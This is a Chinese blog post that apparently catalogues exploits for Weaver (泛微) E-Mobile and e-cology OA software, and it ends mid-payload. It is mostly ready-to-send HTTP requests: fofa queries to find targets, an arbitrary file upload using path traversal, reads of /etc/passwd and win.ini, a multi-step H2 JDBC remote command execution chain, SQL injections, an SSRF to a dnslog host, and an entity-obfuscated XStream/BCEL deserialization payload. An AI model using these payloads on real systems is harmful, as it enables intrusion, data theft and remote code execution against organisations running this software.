泛微最新漏洞汇总----实时更新!!!

已于 2024-09-20 17:13:40 修改
阅读量9.3k 收藏 27
点赞数 6
文章标签: 安全
于 2023-07-31 10:41:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567655/article/details/132017321
版权

泛微E-Mobile系列

E-mobile lang2sql接口任意文件上传漏洞

title="移动管理平台-企业管理"

POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
Host: ip:port
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 226
Expect: 100-continue
Connection: close
 
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/Check.txt"
 
This site has a vulnerability !!!
------WebKitFormBoundarymVk33liI64J7GQaK--

E-mobile client/cdnfile/接口存在任意文件读取

fofa:icon_hash="2062026853"

poc:

GET /client/cdnfile/1C/Windows/win.ini HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
GET /client/cdnfile/C/etc/passwd HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx

泛微E-cology系列

e-cology-v10-H2 远程命令执行

影响范围
泛微e-cology-v10
网络空间测绘查询
body="/build/passport/static/js/lib.js" || body="/build/ecodesdk/static/js/lib.js"||icon_hash="-1619753057"

1.获取serviceTIcketId

POST /papi/passport/rest/appThirdLogin HTTP/1.1
Host: 11.11.11.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Content-Length: 48
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

username=sysadmin&service=1&ip=1&loginType=third

2.获取data

POST /papi/passport/login/generateEteamsId HTTP/1.1
Host: 11.11.11.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

stTicket={{serviceTicketId}}

3.加载org.h2.Driver数据库驱动类

POST /api/bs/iaauthclient/base/save HTTP/1.1
Host: 11.11.11.11
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Length: 86
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Cookie: ETEAMS_TGC=TGT3680-PBpQuYoZlFULf5txX0HYNePnq97mS3q5FSb9qm7njxPcxe0sXBE; 
Origin: http://ip
ETEAMSID=THIRD_30a90b771dd1929f3200ad2191083b9e
Referer: http://ip/

{"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}}

4.执行系统命令

POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1
Host: <hostname>
Content-Length: 199
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ip
Referer: http://ip/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
ETEAMSID: {{data}}

{
    "dbType": "mysql5",
    "dbUrl": "jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ javascript java.lang.Runtime.getRuntime().exec(\"{cmd}\") $$"
}

泛微e-cology HrmService SQL注入漏洞

poc :

POST /services/ModeDateService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx//services/Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ecology_JSessionid=aaasJ-HspHcxI5r2Krufz; JSESSIONID=aaasJ-HspHcxI5r2Krufz
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: xxx 
Content-Length: 405

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:mod="http://localhost/services/ModeDateService">
   <soapenv:Header/>   
   <soapenv:Body>
      <mod:getAllModeDataCount>
		<mod:in0>1</mod:in0>         
		<mod:in1>1</mod:in1>         
		<mod:in2>1=1</mod:in2>         
		<mod:in3>1</mod:in3>
	  </mod:getAllModeDataCount>
  </soapenv:Body>
</soapenv:Envelope>

 

泛微e-cology InformationLeakage信息泄露

GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1 
Host: {{Hostname}} 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

泛微 e-cology  GetLabelByModule SQL注入

poc:

GET /api/ec/dev/locale/getLabelByModule?moduleCode=?moduleCode=?moduleCode=1%27)%20union%20all%20select%20%27666666,%27%20-- HTTP/1.1
Host: your-ip

泛微e-cology getFileViewUrl接口存在SSRF漏洞

POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1
Host: xx.xxx.xx.xxx
User-Agent:Mozilla/5.0(Windows NT 10.0; WOW64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/108.0.0.0Safari/537.36
Accept:*/*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Content-Length: 110
{
    "file_id": "1000",
    "file_name": "c",
    "download_url":"http://kitgeqiwwobfretc.t841xp.dnslog.cn"
}

泛微e-cology HrmService SQL注入漏洞


POST /services/HrmService HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36    
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: close
SOAPAction: urn:weaver.hrm.webservice.HrmService.getHrmDepartmentInfo
Content-Type: text/xml;charset=UTF-8 
Content-Length: 427        


geroet1)AND(db_name()like'ec%'

泛微e-cology WorkflowServiceXml SQL注入漏洞

fofa:app="泛微-OA(e-cology)"

POST /services/WorkflowServiceXml HTTP/1.1
or 
POST /services%20/WorkflowServiceXml HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 475
Content-Type: text/xml
Accept-Encoding: gzip, deflate, br
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:doCreateWorkflowRequest><web:string>
&#60;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#80;&#114;&#105;&#111;&#114;&#105;&#116;&#121;&#81;&#117;&#101;&#117;&#101;&#32;&#115;&#101;&#114;&#105;&#97;&#108;&#105;&#122;&#97;&#116;&#105;&#111;&#110;&#61;&#39;&#99;&#117;&#115;&#116;&#111;&#109;&#39;&#62;&#10;&#32;&#32;&#60;&#117;&#110;&#115;&#101;&#114;&#105;&#97;&#108;&#105;&#122;&#97;&#98;&#108;&#101;&#45;&#112;&#97;&#114;&#101;&#110;&#116;&#115;&#47;&#62;&#10;&#32;&#32;&#60;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#80;&#114;&#105;&#111;&#114;&#105;&#116;&#121;&#81;&#117;&#101;&#117;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#105;&#122;&#101;&#62;&#50;&#60;&#47;&#115;&#105;&#122;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#109;&#112;&#97;&#114;&#97;&#116;&#111;&#114;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#102;&#120;&#46;&#99;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#46;&#79;&#98;&#115;&#101;&#114;&#118;&#97;&#98;&#108;&#101;&#76;&#105;&#115;&#116;&#36;&#49;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#105;&#110;&#116;&#62;&#51;&#60;&#47;&#105;&#110;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#98;&#105;&#110;&#100;&#46;&#118;&#50;&#46;&#114;&#117;&#110;&#116;&#105;&#109;&#101;&#46;&#117;&#110;&#109;&#97;&#114;&#115;&#104;&#97;&#108;&#108;&#101;&#114;&#46;&#66;&#97;&#115;&#101;&#54;&#52;&#68;&#97;&#116;&#97;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#97;&#116;&#97;&#72;&#97;&#110;&#100;&#108;&#101;&#114;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#97;&#116;&#97;&#83;&#111;&#117;&#114;&#99;&#101;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#119;&#115;&#46;&#101;&#110;&#99;&#111;&#100;&#105;&#110;&#103;&#46;&#120;&#109;&#108;&#46;&#88;&#77;&#76;&#77;&#101;&#115;&#115;&#97;&#103;&#101;&#36;&#88;&#109;&#108;&#68;&#97;&#116;&#97;&#83;&#111;&#117;&#114;&#99;&#101;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#84;&#121;&#112;&#101;&#62;&#116;&#101;&#120;&#116;&#47;&#112;&#108;&#97;&#105;&#110;&#60;&#47;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#84;&#121;&#112;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#105;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#105;&#111;&#46;&#83;&#101;&#113;&#117;&#101;&#110;&#99;&#101;&#73;&#110;&#112;&#117;&#116;&#83;&#116;&#114;&#101;&#97;&#109;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#101;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#120;&#46;&#115;&#119;&#105;&#110;&#103;&#46;&#77;&#117;&#108;&#116;&#105;&#85;&#73;&#68;&#101;&#102;&#97;&#117;&#108;&#116;&#115;&#36;&#77;&#117;&#108;&#116;&#105;&#85;&#73;&#68;&#101;&#102;&#97;&#117;&#108;&#116;&#115;&#69;&#110;&#117;&#109;&#101;&#114;&#97;&#116;&#111;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#105;&#116;&#101;&#114;&#97;&#116;&#111;&#114;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#116;&#111;&#111;&#108;&#115;&#46;&#106;&#97;&#118;&#97;&#99;&#46;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#105;&#110;&#103;&#46;&#74;&#97;&#118;&#97;&#99;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#105;&#110;&#103;&#69;&#110;&#118;&#105;&#114;&#111;&#110;&#109;&#101;&#110;&#116;&#36;&#78;&#97;&#109;&#101;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#73;&#116;&#101;&#114;&#97;&#116;&#111;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#110;&#97;&#109;&#101;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#65;&#98;&#115;&#116;&#114;&#97;&#99;&#116;&#76;&#105;&#115;&#116;&#36;&#73;&#116;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#117;&#114;&#115;&#111;&#114;&#62;&#48;&#60;&#47;&#99;&#117;&#114;&#115;&#111;&#114;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#108;&#97;&#115;&#116;&#82;&#101;&#116;&#62;&#45;&#49;&#60;&#47;&#108;&#97;&#115;&#116;&#82;&#101;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#101;&#120;&#112;&#101;&#99;&#116;&#101;&#100;&#77;&#111;&#100;&#67;&#111;&#117;&#110;&#116;&#62;&#48;&#60;&#47;&#101;&#120;&#112;&#101;&#99;&#116;&#101;&#100;&#77;&#111;&#100;&#67;&#111;&#117;&#110;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#111;&#117;&#116;&#101;&#114;&#45;&#99;&#108;&#97;&#115;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#65;&#114;&#114;&#97;&#121;&#115;&#36;&#65;&#114;&#114;&#97;&#121;&#76;&#105;&#115;&#116;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#97;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#115;&#116;&#114;&#105;&#110;&#103;&#45;&#97;&#114;&#114;&#97;&#121;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#36;&#36;&#66;&#67;&#69;&#76;&#36;&#36;&#36;&#108;&#36;&#56;&#98;&#36;&#73;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#56;&#100;&#86;&#36;&#100;&#57;&#87;&#36;&#84;&#87;&#36;&#105;&#36;&#102;&#101;&#36;&#71;&#36;&#67;&#51;&#36;&#77;&#36;&#99;&#51;&#98;&#36;&#81;&#97;&#36;&#53;&#99;&#36;&#98;&#49;&#117;&#36;&#74;&#36;&#119;&#36;&#99;&#49;&#36;&#101;&#101;&#36;&#86;&#36;&#97;&#57;&#36;&#86;&#65;&#36;&#53;&#99;&#36;&#103;&#36;&#100;&#48;&#36;&#103;&#36;&#56;&#97;&#36;&#86;&#109;&#36;&#101;&#100;&#48;&#36;&#53;&#99;&#36;&#54;&#48;&#36;&#109;&#36;&#99;&#99;&#36;&#99;&#52;&#36;&#99;&#57;&#68;&#36;&#57;&#48;&#36;&#36;&#118;&#36;&#98;&#51;&#36;&#57;&#98;&#36;&#100;&#100;&#119;&#107;&#36;&#98;&#55;&#36;&#57;&#55;&#36;&#107;&#95;&#36;&#100;&#98;&#36;&#51;&#101;&#68;&#79;&#36;&#55;&#98;&#36;&#100;&#97;&#36;&#100;&#51;&#36;&#56;&#55;&#36;&#98;&#101;&#36;&#100;&#56;&#83;&#36;&#108;&#36;&#100;&#97;&#36;&#51;&#102;&#36;&#97;&#56;&#36;&#102;&#54;&#36;&#98;&#98;&#36;&#57;&#51;&#36;&#52;&#48;&#36;&#74;&#36;&#56;&#57;&#36;&#100;&#97;&#36;&#57;&#99;&#36;&#57;&#51;&#36;&#55;&#98;&#36;&#101;&#55;&#36;&#102;&#101;&#36;&#101;&#101;&#111;&#36;&#98;&#98;&#36;&#98;&#102;&#36;&#101;&#102;&#36;&#98;&#98;&#36;&#98;&#102;&#36;&#57;&#57;&#36;&#51;&#102;&#36;&#102;&#101;&#36;&#102;&#57;&#36;&#101;&#57;&#87;&#36;&#65;&#36;&#102;&#55;&#36;&#101;&#51;&#36;&#53;&#98;&#36;&#106;&#36;&#71;&#36;&#83;&#36;&#51;&#97;&#36;&#71;&#48;&#36;&#97;&#56;&#36;&#101;&#49;&#36;&#56;&#56;&#36;&#57;&#99;&#36;&#56;&#102;&#36;&#101;&#97;&#120;&#36;&#105;&#36;&#99;&#55;&#36;&#101;&#52;&#36;&#57;&#48;&#36;&#100;&#52;&#48;&#36;&#97;&#52;&#36;&#101;&#51;&#36;&#74;&#36;&#77;&#107;&#56;&#36;&#97;&#101;&#36;&#101;&#50;&#73;&#36;&#106;&#36;&#51;&#97;&#78;&#36;&#97;&#56;&#36;&#89;&#36;&#100;&#49;&#113;&#36;&#83;&#36;&#97;&#55;&#36;&#97;&#52;&#36;&#100;&#57;&#83;&#82;&#36;&#102;&#50;&#36;&#98;&#52;&#36;&#56;&#54;&#36;&#100;&#51;&#114;&#36;&#55;&#101;&#70;&#36;&#56;&#55;&#36;&#56;&#53;&#81;&#57;&#36;&#100;&#56;&#36;&#103;&#36;&#99;&#54;&#84;&#36;&#73;&#36;&#78;&#36;&#101;&#51;&#36;&#51;&#97;&#36;&#57;&#97;&#49;&#36;&#97;&#49;&#97;&#82;&#36;&#56;&#53;&#36;&#97;&#51;&#97;&#74;&#36;&#99;&#53;&#36;&#98;&#52;&#36;&#56;&#101;&#36;&#85;&#102;&#116;&#36;&#97;&#99;&#36;&#56;&#49;&#36;&#97;&#98;&#36;&#99;&#49;&#36;&#57;&#51;&#115;&#90;&#36;&#79;&#103;&#36;&#101;&#52;&#36;&#101;&#48;&#107;&#36;&#99;&#56;&#36;&#97;&#56;&#36;&#73;&#116;&#36;&#100;&#99;&#36;&#56;&#100;&#36;&#97;&#99;&#36;&#56;&#97;&#36;&#98;&#51;&#36;&#75;&#36;&#97;&#97;&#36;&#98;&#98;&#36;&#106;&#36;&#100;&#55;&#36;&#74;&#36;&#102;&#54;&#36;&#117;&#36;&#97;&#56;&#36;&#56;&#99;&#36;&#98;&#53;&#36;&#80;&#36;&#120;&#36;&#56;&#56;&#36;&#102;&#52;&#122;&#99;&#66;&#65;&#67;&#36;&#99;&#50;&#113;&#36;&#99;&#53;&#36;&#54;&#48;&#118;&#102;&#84;&#36;&#102;&#56;&#67;&#36;&#100;&#54;&#104;&#36;&#56;&#97;&#36;&#57;&#50;&#104;&#36;&#99;&#50;&#36;&#98;&#51;&#36;&#97;&#100;&#36;&#100;&#52;&#36;&#98;&#48;&#36;&#101;&#53;&#36;&#51;&#98;&#114;&#36;&#98;&#100;&#36;&#109;&#36;&#77;&#36;&#101;&#99;&#116;&#36;&#99;&#54;&#36;&#98;&#51;&#36;&#97;&#55;&#69;&#36;&#52;&#48;&#36;&#102;&#100;&#36;&#101;&#57;&#36;&#100;&#101;&#36;&#57;&#52;&#53;&#36;&#51;&#102;&#36;&#97;&#102;&#36;&#54;&#48;&#69;&#98;&#36;&#99;&#97;&#36;&#51;&#97;&#107;&#117;&#36;&#97;&#54;&#36;&#121;&#119;&#36;&#97;&#50;&#36;&#57;&#51;&#36;&#97;&#50;&#76;&#102;&#55;&#36;&#86;&#36;&#116;&#68;&#36;&#100;&#48;&#36;&#57;&#98;&#36;&#102;&#53;&#36;&#55;&#100;&#36;&#101;&#49;&#36;&#71;&#36;&#99;&#55;&#36;&#99;&#52;&#36;&#57;&#57;&#36;&#97;&#99;&#36;&#99;&#56;&#36;&#69;&#36;&#68;&#36;&#75;&#86;&#36;&#95;&#81;&#36;&#102;&#52;&#36;&#99;&#53;&#120;&#74;&#36;&#100;&#56;&#65;&#36;&#101;&#55;&#36;&#56;&#48;&#36;&#73;&#36;&#115;&#36;&#98;&#100;&#49;&#90;&#36;&#100;&#52;&#36;&#100;&#98;&#69;&#36;&#101;&#97;&#50;&#36;&#56;&#49;&#36;&#102;&#102;&#36;&#98;&#52;&#36;&#56;&#102;&#36;&#56;&#99;&#78;&#81;&#36;&#57;&#57;&#90;&#36;&#99;&#97;&#36;&#98;&#56;&#36;&#67;&#36;&#98;&#51;&#36;&#56;&#99;&#36;&#57;&#98;&#36;&#55;&#101;&#71;&#36;&#97;&#52;&#36;&#97;&#52;&#36;&#88;&#36;&#99;&#100;&#36;&#88;&#36;&#57;&#57;&#36;&#98;&#52;&#36;&#101;&#55;&#102;&#36;&#57;&#56;&#36;&#97;&#98;&#36;&#99;&#101;&#36;&#85;&#36;&#56;&#101;&#36;&#102;&#98;&#78;&#36;&#109;&#36;&#55;&#99;&#36;&#56;&#54;&#86;&#102;&#36;&#86;&#52;&#36;&#101;&#54;&#36;&#101;&#100;&#36;&#105;&#36;&#97;&#102;&#51;&#36;&#95;&#36;&#100;&#101;&#36;&#57;&#100;&#36;&#100;&#55;&#57;&#36;&#117;&#36;&#97;&#99;&#36;&#98;&#49;&#80;&#36;&#97;&#55;&#36;&#100;&#50;&#36;&#57;&#101;&#36;&#90;&#36;&#120;&#36;&#79;&#36;&#57;&#98;&#36;&#77;&#36;&#55;&#99;&#36;&#99;&#55;&#36;&#57;&#100;&#36;&#57;&#48;&#97;&#51;&#36;&#75;&#36;&#57;&#97;&#36;&#102;&#50;&#36;&#104;&#36;&#100;&#57;&#36;&#99;&#48;&#73;&#117;&#36;&#115;&#109;&#36;&#99;&#98;&#117;&#67;&#36;&#80;&#36;&#75;&#36;&#112;&#53;&#36;&#95;&#49;&#36;&#100;&#57;&#36;&#51;&#102;&#103;&#36;&#56;&#98;&#116;&#36;&#101;&#48;&#120;&#36;&#36;&#36;&#102;&#55;&#36;&#111;&#36;&#99;&#49;&#36;&#97;&#52;&#67;&#36;&#99;&#51;&#36;&#57;&#97;&#36;&#99;&#52;&#120;&#36;&#100;&#54;&#36;&#57;&#101;&#36;&#51;&#101;&#36;&#101;&#55;&#101;&#36;&#118;&#36;&#97;&#97;&#75;&#36;&#71;&#36;&#57;&#54;&#36;&#51;&#100;&#36;&#51;&#100;&#36;&#54;&#48;&#36;&#97;&#53;&#36;&#99;&#51;&#36;&#56;&#50;&#36;&#83;&#36;&#81;&#36;&#83;&#36;&#52;&#48;&#36;&#99;&#53;&#36;&#121;&#36;&#101;&#49;&#87;&#49;&#71;&#116;&#36;&#74;&#36;&#118;&#36;&#102;&#49;&#36;&#113;&#36;&#54;&#48;&#36;&#99;&#99;&#36;&#122;&#36;&#101;&#57;&#101;&#36;&#55;&#100;&#36;&#53;&#98;&#36;&#102;&#52;&#36;&#51;&#98;&#36;&#98;&#50;&#36;&#102;&#48;&#70;&#36;&#99;&#49;&#69;&#36;&#53;&#99;&#70;&#50;&#36;&#98;&#48;&#36;&#70;&#36;&#53;&#98;&#85;&#36;&#57;&#99;&#51;&#48;&#36;&#56;&#102;&#103;&#36;&#90;&#36;&#56;&#54;&#56;&#36;&#100;&#57;&#36;&#71;&#36;&#57;&#101;&#36;&#99;&#51;&#36;&#102;&#51;&#36;&#119;&#36;&#53;&#101;&#48;&#112;&#36;&#107;&#36;&#95;&#36;&#103;&#120;&#36;&#74;&#36;&#95;&#36;&#120;&#36;&#100;&#56;&#106;&#36;&#55;&#98;&#51;&#113;&#36;&#100;&#98;&#36;&#99;&#97;&#36;&#100;&#97;&#36;&#57;&#51;&#36;&#53;&#101;&#36;&#100;&#99;&#36;&#86;&#36;&#99;&#49;&#36;&#97;&#99;&#36;&#101;&#55;&#79;&#36;&#99;&#55;&#83;&#78;&#36;&#115;&#36;&#81;&#110;&#36;&#55;&#99;&#36;&#99;&#56;&#78;&#36;&#116;&#36;&#88;&#113;&#84;&#36;&#102;&#49;&#36;&#56;&#97;&#36;&#56;&#49;&#87;&#113;&#36;&#56;&#49;&#80;&#36;&#57;&#54;&#36;&#99;&#48;&#70;&#106;&#36;&#121;&#67;&#36;&#100;&#55;&#36;&#99;&#48;&#107;&#120;&#36;&#57;&#100;&#36;&#100;&#53;&#36;&#53;&#99;&#36;&#56;&#101;&#36;&#79;&#36;&#56;&#102;&#97;&#36;&#101;&#48;&#36;&#78;&#36;&#98;&#99;&#105;&#36;&#101;&#48;&#36;&#122;&#36;&#53;&#99;&#52;&#36;&#102;&#48;&#54;&#36;&#36;&#36;&#100;&#50;&#36;&#102;&#54;&#36;&#102;&#52;&#36;&#67;&#36;&#107;&#36;&#102;&#100;&#36;&#57;&#54;&#36;&#99;&#100;&#50;&#36;&#104;&#120;&#36;&#72;&#36;&#101;&#102;&#36;&#102;&#50;&#36;&#97;&#52;&#36;&#71;&#36;&#100;&#101;&#36;&#99;&#51;&#36;&#102;&#98;&#36;&#71;&#36;&#51;&#101;&#36;&#99;&#48;&#36;&#56;&#55;&#36;&#121;&#36;&#99;&#102;&#36;&#111;&#78;&#36;&#113;&#65;&#49;&#66;&#36;&#75;&#98;&#105;&#111;&#86;&#36;&#102;&#56;&#98;&#36;&#97;&#99;&#109;&#36;&#102;&#52;&#36;&#53;&#99;&#36;&#53;&#98;&#36;&#100;&#97;&#36;&#76;&#36;&#97;&#99;&#36;&#109;&#36;&#101;&#51;&#36;&#98;&#53;&#36;&#57;&#53;&#36;&#102;&#100;&#36;&#90;&#36;&#102;&#56;&#36;&#73;&#36;&#108;&#36;&#101;&#55;&#36;&#57;&#100;&#36;&#101;&#53;&#36;&#66;&#36;&#122;&#36;&#99;&#97;&#48;&#36;&#80;&#36;&#97;&#52;&#36;&#67;&#53;&#36;&#101;&#102;&#99;&#36;&#116;&#79;&#90;&#36;&#67;&#36;&#97;&#54;&#36;&#56;&#97;&#79;&#36;&#77;&#36;&#55;&#99;&#36;&#56;&#97;&#36;&#99;&#102;&#100;&#117;&#36;&#51;&#102;&#87;&#80;&#113;&#36;&#97;&#97;&#36;&#99;&#55;&#36;&#99;&#48;&#36;&#114;&#36;&#55;&#99;&#97;&#36;&#101;&#48;&#50;&#36;&#98;&#101;&#52;&#36;&#102;&#48;&#36;&#86;&#36;&#98;&#101;&#86;&#36;&#65;&#36;&#98;&#50;&#36;&#97;&#48;&#36;&#77;&#36;&#100;&#52;&#36;&#71;&#36;&#98;&#101;&#36;&#99;&#49;&#86;&#36;&#51;&#97;&#36;&#95;&#36;&#54;&#48;&#36;&#97;&#52;&#36;&#97;&#48;&#36;&#102;&#53;&#86;&#36;&#51;&#99;&#87;&#36;&#100;&#48;&#114;&#36;&#76;&#36;&#101;&#101;&#36;&#36;&#100;&#36;&#85;&#36;&#101;&#101;&#36;&#105;&#36;&#99;&#98;&#36;&#98;&#97;&#36;&#56;&#49;&#51;&#83;&#36;&#101;&#48;&#36;&#102;&#48;&#36;&#101;&#50;&#36;&#97;&#50;&#57;&#36;&#100;&#54;&#36;&#57;&#101;&#36;&#117;&#36;&#100;&#49;&#36;&#57;&#49;&#52;&#36;&#84;&#115;&#36;&#99;&#50;&#36;&#115;&#36;&#100;&#97;&#36;&#98;&#49;&#82;&#36;&#101;&#54;&#36;&#36;&#53;&#56;&#36;&#101;&#97;&#36;&#55;&#98;&#36;&#98;&#54;&#36;&#73;&#36;&#95;&#36;&#101;&#55;&#36;&#57;&#50;&#36;&#99;&#50;&#36;&#77;&#77;&#36;&#102;&#97;&#36;&#97;&#99;&#36;&#87;&#121;&#89;&#36;&#98;&#56;&#36;&#55;&#100;&#36;&#76;&#36;&#101;&#98;&#36;&#57;&#53;&#69;&#36;&#98;&#49;&#36;&#102;&#50;&#82;&#90;&#54;&#75;&#36;&#55;&#101;&#120;&#110;&#36;&#109;&#36;&#101;&#54;&#36;&#56;&#50;&#36;&#57;&#48;&#36;&#76;&#36;&#74;&#36;&#95;&#95;&#106;&#36;&#98;&#51;&#72;&#36;&#55;&#100;&#36;&#99;&#57;&#36;&#57;&#54;&#36;&#98;&#52;&#36;&#118;&#36;&#98;&#98;&#65;&#36;&#97;&#56;&#82;&#36;&#55;&#99;&#36;&#73;&#36;&#114;&#36;&#75;&#54;&#36;&